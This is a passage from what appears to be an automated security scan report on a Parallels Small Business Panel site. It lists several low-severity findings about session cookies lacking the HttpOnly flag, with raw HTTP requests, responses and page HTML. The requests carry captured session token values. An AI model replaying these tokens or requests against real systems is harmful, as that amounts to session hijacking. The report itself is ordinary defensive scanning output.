<td style="height: 100%;" class="sb-edit-panel-hidebackground" id="LeftPanelDiv_Bar"><div id="ButtonHideTree" onclick="toggleLeftPanel('/skins/WinXPReloadedCompact/images/right.gif', '/skins/WinXPReloadedCompact/images/left.gif');" align="center" style="width: 21px; height: 100%; border: 0px solid #7D7D7D; float: left; cursor: hand; cursor: pointer;">
<img id="LeftPanelDiv_bullet" class="sb-edit-panel-arrow" style="border-width:0px;" src="/skins/WinXPReloadedCompact/images/left.gif"><br><img id="LeftPanelDiv_Text" style="border-width:0px;" src="/localizedimage.php?localeCode=en_US&amp;section=Wizard_Edit&amp;key=hideSiteMap">
</div></td>
</tr></table>
</td>
<td valign="top" style="width: 100%; height: 100%">
<div class="sb-edit-modulename">
<img style="border-width:0px;" src="/modules/ImageGallery/images/icon.gif"><span class="sb-page-title" style="padding-left: 9px;">Image Gallery</span>
</div>
<table class="sb-formtable" cellspacing="0" border="0" style="border-collapse:collapse;height: 99%; width: 100%;"><tr><td valign="top">
<input type="hidden" name="tab" value="image_upload"><input type="hidden" name="pageNum" value=""><input type="hidden" name="pageSize" value=""><input type="hidden" name="orderBy" value=""><input type="hidden" name="orderType" value=""><input type="hidden" name="viewAction" id="viewAction" value="/Wizard/Edit"><table class="sb-formtable" cellpadding="0" cellspacing="0" width="100%" border="0">
<tr class="sb-formtableheader"><th valign="bottom" align="left" class="sb-formtableheader-th" style="width: 100%;"><table style="width:100%;" cellpadding="0" cellspacing="0" border="0" class="sb-formtable"><tr><td valign="top" style="width:100%;"><table border="0" cellspacing="0" cellpadding="0"><tr>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:default;width:10px; height: 21px;" class="TabLabelSelectedStyle" id="image_management" onclick="javascript:tabPanelToggle('sb_panel', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOn.gif" alt="" id="image_management_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOn.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="image_management_T">Images</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOn.gif" id="image_management_IR" alt=""></td>
</tr></table></td>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:pointer;width:10px;height: 21px;" class="TabLabelDefaultStyle" id="categories" onclick="javascript:tabPanelToggle('sb_panel', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOff.gif" alt="" id="categories_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOff.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="categories_T">Categories</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOff.gif" id="categories_IR" alt=""></td>
</tr></table></td>
<td><table border="0" cellspacing="0" cellpadding="0" style="cursor:pointer;width:10px;height: 21px;" class="TabLabelDefaultStyle" id="settings" onclick="javascript:tabPanelToggle('sb_panel', this);"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/tabLeftOff.gif" alt="" id="settings_IL"></td>
<td class="sb-button-tabs-text" style="white-space:nowrap;width:100%;background-image:url(/skins/WinXPReloadedCompact/images/tabMiddleOff.gif);background-repeat:repeat-x scroll 0px; padding-left: 5px; padding-right: 5px;" id="settings_T">Settings</td>
<td><img src="/skins/WinXPReloadedCompact/images/tabRightOff.gif" id="settings_IR" alt=""></td>
</tr></table></td>
</tr></table></td></tr></table></th></tr>
<tr><td style="padding: 10px;" class="sb-page">
<div style="display:block;" id="image_managementContent">
<script src="/modules/ImageGallery/js/imageManagement.js?5.0.0.2009110318" type="text/javascript"></script><fieldset>
<legend>Tools</legend>
<div class="fieldset-block"><table cellspacing="0" border="0" style="border-collapse:collapse;"><tr>
<td valign="top"><table cellpadding="0" cellspacing="0" border="0" class="sb-button-tool-table" onclick='javascript: self.sbApplyChangesObject.registerForcedSaving();sbNavigationObject.go("/Wizard/Edit/Modules/ImageGallery/ImageUpload");' style="cursor: pointer; width: 80px;">
<tr>
<td rowspan="2" style="width:0;"></td>
<td align="center" valign="middle"><img border="0" alt="" src="/skins/WinXPReloadedCompact/icons/AddImage.png"></td>
</tr>
<tr><td align="center" class="sb-button-tool-text">Image Upload</td></tr>
</table></td>
<td valign="top"><table cellpadding="0" cellspacing="0" border="0" class="sb-button-tool-table" onclick='javascript: self.sbApplyChangesObject.registerForcedSaving();sbNavigationObject.go("/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload");' style="cursor: pointer; width: 80px;">
<tr>
<td rowspan="2" style="width:0;"></td>
<td align="center" valign="middle"><img border="0" alt="" src="/skins/WinXPReloadedCompact/icons/AddImage.png"></td>
</tr>
<tr><td align="center" class="sb-button-tool-text">Multiple Image Upload</td></tr>
</table></td>
</tr></table></div>
</fieldset>
<script type="text/javascript" src="/js/list.js?5.0.0.2009110318"></script><script language="javascript">
function pagedListDoSort(tab, orderBy, orderType) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.action = '/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload';
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.orderBy.value = orderBy;
   form.orderType.value = orderType;
   form.submit();
}
</script><fieldset>
<legend>Images</legend>
<div class="fieldset-block">
<div class="list-tool-block"><table cellspacing="0" cellpadding="0" border="0" class="link-button-container"><tr>
<td class="link-button-image-area"><a href="#" onclick="deleteImages()"><img border="0" alt="" src="/skins/WinXPReloadedCompact/icons/delete.png"></a></td>
<td class="link-button-text-area"><a href="#" style="color: Black;" onclick="deleteImages()">Remove Selected</a></td>
</tr></table></div>
<div class="clear"></div>
<table cellpadding="0" cellspacing="0" border="0"><tr>
<td>
<script language="javascript">
function pagedListChangeFilter(tab) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.action = '/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload';

   form.submit();
}
</script><table cellpadding="0" cellspacing="0" border="0" class="list-show-container"><tr>
<td class="list-show-view-text-area"><label class="name" for="image_managementfilterValue"></label></td>
<td class="list-show-view-list-area"><select id="image_managementfilterValue" name="image_managementfilterValue" onchange="pagedListChangeFilter('image_management');"><option value="allCategories">All</option>
<option value="noCategories">Not categorized</option>
<option value="1">Category1</option>
<option value="2">Category2</option></select></td>
</tr></table>
</td>
<td>
<script language="javascript">
function pagedListShowAll(tab) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.action = '/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload';

   if (form.filterValue) {
       form.filterValue.selectedIndex = 0;
   }
   form.elements[tab+'searchString'].value='';
   form.submit();
}
function pagedListSearchItems(tab) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.action = '/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload';

   form.submit();
}
function pagedListChangeFilter(tab) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.action = '/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload';

   form.submit();
}
</script><table cellpadding="0" cellspacing="0" border="0" class="list-show-container"><tr>
<td class="list-show-search-input-area"><input type="text" size="25" maxlength="255" class="sb-input" name="image_managementsearchString"></td>
<td class="list-show-search-tool-area"><table cellpadding="0" cellspacing="0" border="0" type="button" style="cursor:pointer;" class="link-button-container" onclick="pagedListSearchItems('image_management');"><tr>
<td class="link-button-image-area"><img src="/skins/WinXPReloadedCompact/icons/search.png" alt=""></td>
<td class="link-button-text-area"><span style="text-decoration: underline;">Search</span></td>
</tr></table></td>
<td class="list-show-showall-tool-area"><table cellpadding="0" cellspacing="0" border="0" type="button" name="ImageButtonShowAll" style="cursor:pointer;" class="link-button-container" onclick="pagedListShowAll('image_management');"><tr>
<td class="link-button-image-area"><img src="/skins/WinXPReloadedCompact/icons/showall.png" alt=""></td>
<td class="link-button-text-area"><span style="text-decoration: underline;">Show All</span></td>
</tr></table></td>
</tr></table>
</td>
</tr></table>
<script language="javascript">
function pagedListGotoPage(tab, pageNum) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = pageNum;
   form.submit();
}
function pagedListSetPageSize(tab, pageSize) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.pageSize.value = pageSize;
   form.submit();
}
</script><table width="100%" cellspacing="0" cellpadding="0" border="0" class="list-pager-container"><tr>
<td class="list-pager-total-area">3..records total</td>
<td class="list-pager-go-area"></td>
<td class="list-pager-numbers-area">Number of entries per page:..
       <a href="javascript:pagedListSetPageSize('image_management',5);">5</a>..
       <strong>10</strong>..
       <a href="javascript:pagedListSetPageSize('image_management',25);">25</a>..
       <a href="javascript:pagedListSetPageSize('image_management',100);">100</a>
</td>
</tr></table>
<div class="scroll-table"><table cellspacing="0" cellpadding="0" border="0" class="list-table">
<tr class="fixed">
<th style="width:1%;"><div><input type="checkbox" name="globalCheck" onclick="setImageCheckboxStatus(this.checked);" class="check"></div></th>
<th style="width:1%;"><div>P</div></th>
<th scope="col"><div>Name</div></th>
<th scope="col"><div>Categories</div></th>
<th scope="col"><div>Dimension</div></th>
<th scope="col"><div>Size (KB)</div></th>
<th style="width:1%;text-align:center; " scope="col"><div>Edit</div></th>
</tr>
<tr class="list-table-row">
<td style="width:1%;"><input type="checkbox" name="imageId[]" class="check" value="1"></td>
<td><a href="#" onclick="window.open('/Wizard/Edit/Modules/Image?file=data/storage/attachments/276e6d26f703339c19673c83a6febf28.jpg', 'imagepreview', 'width=497, height=657, resizable=yes, tolbar=no, status=yes, scrollbars=yes');return false;"><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/icons/prew.png"></a></td>
<td style="text-align:;">Image1</td>
<td style="text-align:;"></td>
<td style="text-align:;">480x640</td>
<td style="text-align:;">48.89</td>
<td style="width:1%; text-align:center; "><a href="#" onclick="
                       self.sbApplyChangesObject.registerForcedSaving();
                       sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery/Image/Edit?id=1');
                   "><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/icons/editsiteinwizard.png"></a></td>
</tr>
<tr class="list-table-row-alter">
<td style="width:1%;"><input type="checkbox" name="imageId[]" class="check" value="2"></td>
<td><a href="#" onclick="window.open('/Wizard/Edit/Modules/Image?file=data/storage/attachments/7f1189d907afe728b38592d8e8cbb3db.jpg', 'imagepreview', 'width=497, height=657, resizable=yes, tolbar=no, status=yes, scrollbars=yes');return false;"><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/icons/prew.png"></a></td>
<td style="text-align:;">Image2</td>
<td style="text-align:;"></td>
<td style="text-align:;">480x640</td>
<td style="text-align:;">22.61</td>
<td style="width:1%; text-align:center; "><a href="#" onclick="
                       self.sbApplyChangesObject.registerForcedSaving();
                       sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery/Image/Edit?id=2');
                   "><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/icons/editsiteinwizard.png"></a></td>
</tr>
<tr class="list-table-row">
<td style="width:1%;"><input type="checkbox" name="imageId[]" class="check" value="3"></td>
<td><a href="#" onclick="window.open('/Wizard/Edit/Modules/Image?file=data/storage/attachments/5d66efcd885929ce2577664b29230f0d.jpg', 'imagepreview', 'width=497, height=657, resizable=yes, tolbar=no, status=yes, scrollbars=yes');return false;"><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/icons/prew.png"></a></td>
<td style="text-align:;">Image3</td>
<td style="text-align:;"></td>
<td style="text-align:;">480x640</td>
<td style="text-align:;">23.35</td>
<td style="width:1%; text-align:center; "><a href="#" onclick="
                       self.sbApplyChangesObject.registerForcedSaving();
                       sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery/Image/Edit?id=3');
                   "><img style="border-width:0px;width:16px;height:16px" src="/skins/WinXPReloadedCompact/icons/editsiteinwizard.png"></a></td>
</tr>
</table></div>
<script language="javascript">
function pagedListGotoPage(tab, pageNum) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = pageNum;
   form.submit();
}
function pagedListSetPageSize(tab, pageSize) {
   var formName = 'SB_WizardForm';
   var form = document.forms[formName];
   form.tab.value = tab;
   form.pageNum.value = 1;
   form.pageSize.value = pageSize;
   form.submit();
}
</script><table width="100%" cellspacing="0" cellpadding="0" border="0" class="list-pager-container"><tr>
<td class="list-pager-total-area">3..records total</td>
<td class="list-pager-go-area"></td>
<td class="list-pager-numbers-area">Number of entries per page:..
       <a href="javascript:pagedListSetPageSize('image_management',5);">5</a>..
       <strong>10</strong>..
       <a href="javascript:pagedListSetPageSize('image_management',25);">25</a>..
       <a href="javascript:pagedListSetPageSize('image_management',100);">100</a>
</td>
</tr></table>
<script type="text/javascript" language="javascript">
                       observeCheckboxesClick('Ids[]',
                           'Top'
                       );
                       observeListRowsHighlight();
                   </script>
</div>
</fieldset>
</div>
<div style="display:none;" id="categoriesContent"></div>
<div style="display:none;" id="settingsContent"></div>
</td></tr>
<tr class="sb-formtablefooter"><th style="width: 100%;">..</th></tr>
</table>
<script type="text/javascript">imgPath='/skins/WinXPReloadedCompact/images/';</script><script type="text/javascript" src="/js/tabpanel.js?5.0.0.2009110318"></script><script type="text/javascript">sb_panel = new TabPanel();
           sb_panel.setupAllPages();
       </script>
</td></tr></table>
</td>
</tr></table></td></tr></table>
</td></tr>
<tr id="TRFooter"><td colspan="2"><table cellpadding="0" cellspacing="0" border="0" width="100%" class="sb-footer-container"><tr><td class="sb-footer"><table cellpadding="0" cellspacing="0" border="0" style="width: 100%; height: 100%;"><tr>
<td><table border="0" cellpadding="0" cellspacing="5" style="height: 100%; padding: 5px 0;"><tr><td class="sb-footer-text" style="white-space: nowrap;padding-left: 15px;">
                                       .... Copyright 2004-2009 Parallels All Rights Reserved.</td></tr></table></td>
<td align="right" style="padding-right: 10px;"><table cellpadding="0" cellspacing="0"><tr>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" value="Back" style="cursor:pointer;" onclick="return sbNavigationObject.go('/Wizard/Pages');"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/go_back_l.gif"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_back_bullet.gif"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Back</td>
<td><img src="/skins/WinXPReloadedCompact/images/go_back_r.gif"></td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" type="button" value="Preview" style="cursor: pointer;" onclick="sbNavigationObject.setViewParam('preview','show');sbNavigationObject.go('/Wizard/Edit/Modules/ImageGallery/MultiImagesUpload');sbNavigationObject.unsetViewParam('preview');"><tr>
<td style="width:0px;"></td>
<td style="background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_preview_bullet.gif"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Preview</td>
</tr></table></td>
<td><table cellpadding="0" cellspacing="0" border="0" value="Forward" style="cursor:pointer;" onclick="return sbNavigationObject.go('/Wizard/Publish');"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/go_next_l.gif" border="0"></td>
<td background="/skins/WinXPReloadedCompact/images/go_bg.gif" style="padding-left:15px;padding-right:5px;"><img src="/skins/WinXPReloadedCompact/images/go_next_bullet.gif" border="0"></td>
<td align="center" class="sb-go-text" style="padding: 0 15px 0 5px; width:40px; background-image:url(/skins/WinXPReloadedCompact/images/go_bg.gif);">Next</td>
<td><img src="/skins/WinXPReloadedCompact/images/go_next_r.gif" border="0"></td>
</tr></table></td>
</tr></table></td>
</tr></table></td></tr></table></td></tr>
</table>
</form>
</body>
</html>

3.18. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Overview  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Overview

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Overview HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Tue, 12 Oct 2010 01:05:42 GMT
Connection: close


3.19. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Pages  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Pages

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Pages HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html?currentPageId=q485ez4jvyq
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Tue, 12 Oct 2010 01:05:20 GMT
Connection: close


3.20. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Publish  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Publish

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Publish HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html?currentPageId=q485ez4jvyq
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Location: /Login
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Tue, 12 Oct 2010 01:05:35 GMT
Connection: close


3.21. http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Start  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://vulnerarable.plesk.smb.10.2.0.site:2006
Path:   /Wizard/Start

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Wizard/Start HTTP/1.1
Host: vulnerarable.plesk.smb.10.2.0.site:2006
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://vulnerarable.plesk.smb.10.2.0.site:2006/Wizard/Edit/Html?currentPageId=q485ez4jvyq
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
Set-Cookie: SessionID=42b54cb11fc3aedbd; path=/
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 04:59:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<link href="/skins/common.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link href="/skins/WinXPReloadedCompact/style.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link href="/skins/style_ext.css?5.0.0.2009110318" type="text/css" rel="stylesheet">
<link rel="shortcut icon" href="/favicon.ico?5.0.0.2009110318">
<script type="text/javascript" src="/js/externals/prototype.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/externals/scriptaculous/scriptaculous.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Console.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/util.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/preloader.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/Sb/Cookie.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/common.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/validator.js?5.0.0.2009110318"></script><script type="text/javascript" src="/js/SbAjaxRequest.js?5.0.0.2009110318"></script><style type="text/css">img{ behavior:url('/images/pngbehavior.htc?5.0.0.2009110318'); }</style>
<title>Start -
       Parallels Small Business Panel</title>
</head>
<body onload="ProcessOnloadActions();">
<script type="text/javascript">
                   if ('1' == '') {
                       Sb.Console.enable();

                       
                   }
                                   
                   Sb.Cookie.set('testCookie', 'test', '', '/');

                   if ('test' != Sb.Cookie.get('testCookie')) {
                       document.location.href = "/NoCookies";
                   }

                   // define global variables
                   sbSkinPath = '/skins/WinXPReloadedCompact';
                   sbBrowserEngine = 'MSIE';
                   sbBaseUrl = '';
                   sbVersion = '5.0.0';
                   sbBuild = '2009110318';
               </script><script src="/js/locale.js?5.0.0.2009110318" type="text/javascript"></script><script type="text/javascript" language="javascript">
               SbAppendLocaleKey('SITE-FAMILY-CHANGED', 'The site family has been changed.');
           
               SbAppendLocaleKey('PREVIEW-POPUP-BLOCKED', 'The site preview window was blocked by your browser. To preview the site, please allow pop-up windows for this domain.');
           
               SbAppendLocaleKey('CONTENT-MODIFIED', 'Modified');
           
               SbAppendLocaleKey('AJAX-REQUEST-LOADING', 'Loading...');
           
               SbAppendLocaleKey('AJAX-REQUEST-WAIT', 'Please wait.');
           </script><div id="fullScreenDiv" style="position:absolute; background: #ffffff; filter:alpha(opacity=0); opacity: 0;"></div>
<div id="disablerDiv" style="display: none; filter:alpha(opacity=40); background-color: #FFFFFF; opacity: 0.4;"></div>
<table id="SB_loader_table" cellpadding="0" cellspacing="0" border="0" width="100%" height="100%" style="display:none;z-index:1098;position:absolute;"><tr><td id="SB_loader_td" style="filter:alpha(opacity=40);background-color:#ffffff;-moz-opacity:0.40;"></td></tr></table>
<div id="DIV_DESKTOP" style="width:1%;height:1%;display:none;text-align:center;position:absolute;left:0px;top:0px;z-index:1001;"></div>
<div id="loader" style="height:56px;width:320px;display:none;position:absolute;left:0px;top:0px;z-index:1100;"><table border="0" cellspacing="3" cellpadding="3" width="100%" height="100%" class="sb-preloader-table"><tr>
<td align="center" valign="middle" width="15%"><img id="ImagePreloader" src="/skins/WinXPReloadedCompact/images/loading.gif" style="border-width:0px;"></td>
<td align="left" valign="middle"><span id="LabelPreloader"><strong>Please wait.</strong><br><strong>Loading...</strong></span></td>
</tr></table></div>
<iframe src="/blank.html" id="SB_loader_iframe" name="SB_loader_iframe" frameborder="0" scrolling="no" style="border-width:0;display:none;z-index:1099;position:absolute;height:56px;width:320px;"></iframe><script type="text/javascript" language="javascript"><!--
               var sbPreloader = new SbPreloader();
               
                       sbPreloader.show();
                   
           //--></script><script type="text/javascript">
                   sb_status = null;
               </script><script type="text/javascript" language="javascript" src="/js/modal_form.js?5.0.0.2009110318"></script><div id="SbApplyChangesBackground" style="background-color:black; filter:alpha(opacity=15); opacity: 0.15; z-index:101; position:absolute; overflow:hidden; display:none;"></div>
<div id="SbApplyChanges" style="width:300px; height:145px; display:none;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="height: 100%;"><table cellspacing="0" cellpadding="0" style="width:100%; height: 100%;"><tr>
<td style="width:100%; background-color:white; vertical-align:top;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;">
<tr><td style="cursor:pointer; user-select:none; -moz-user-select:none; border:solid 1px #E3E3E3; width: 100%;"><table cellspacing="0" cellpadding="2" border="0" class="sb-modalbox-header" style="width:100%; border-collapse:collapse;"><tr>
<td id="SbApplyChangesHeader" style="width:99%; white-space:nowrap; padding-left:6px;"><span id="SbApplyChangesTitle" class="sb-modalbox-header-text" style="padding-left:6px; vertical-align:middle;">Apply Changes</span></td>
<td align="right" style="width:1%; padding: 4px 4px 4px 6px;" onclick="sbApplyChangesObject.hide();"><img width="16" height="16" src="/skins/WinXPReloadedCompact/icons/close.png" alt="Close dialog" style="border-width:0px; display:inline; vertical-align:middle;"></td>
</tr></table></td></tr>
<tr><td style="vertical-align:top;"></td></tr>
<tr><td style="width:100%; height:100%;padding: 10px;"><table cellpadding="0" cellspacing="0" border="0" style="width:100%; height:100%;"><tr><td valign="top"><table width="80%" cellspacing="0" cellpadding="0" border="0" align="center">
<tr><td colspan="3" style="padding-bottom:10px; padding-left:10px;"><table cellpadding="0" cellspacing="0" border="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/applychanges.gif" border="0"></td>
<td class="sb-text" style="padding-left:30px;">Apply changes?</td>
</tr></table></td></tr>
<tr>
<td align="center" width="33%" style="padding-right:15px;"><table align="center" onclick="return sbApplyChangesObject.yes(); return false;" style="cursor:pointer; width:70px;" border="0" cellpadding="0" cellspacing="0"><tr>
<td><img src="/skins/WinXPReloadedCompact/images/button_left.gif"></td>
<td class="sb-text" style="width:100%; background-image: url(/skins/WinXPReloadedCompact/images/button_middle.gif); white-space: nowrap;" align="center">Yes</td>
<td><img src="/skins/WinXPReloadedCompact/images/button_right.gif"></td>
</tr></table></td>
